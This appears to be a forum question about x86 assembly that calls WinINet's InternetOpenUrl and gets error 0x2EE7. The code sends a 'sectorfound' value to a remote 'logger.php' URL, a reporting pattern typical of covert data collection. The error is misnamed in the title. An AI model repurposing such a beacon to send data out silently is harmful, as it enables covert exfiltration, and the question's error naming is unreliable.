Why InternetOpenUrl returns ERROR_SXS_KEY_NOT_FOUND (00002EE7)?
This is the code:
     
 invoke InternetGetConnectedState,Storage ,0
 cmp eax,0
 jz Lab1
 invoke strcpy,_urlTmp ,url
 invoke strcat, _urlTmp ,sectorfound
 invoke InternetOpen,[sAgent], 0, 0, 0, 0
 mov [hConnect], eax
 invoke InternetOpenUrl, [hConnect],_urlTmp, 0,0,0,0
 mov [hUrl],eax
 invoke InternetCloseHandle,[hConnect]
 invoke InternetCloseHandle,[hUrl]
 ret
 Storage  dw 0,0
 sAgent   dd 0,0
 hConnect dd 0,0
 hUrl     dd 0,0
 url db  'http://site.oeg/logger.php',0
_urlTmp         db 2048 dup (0)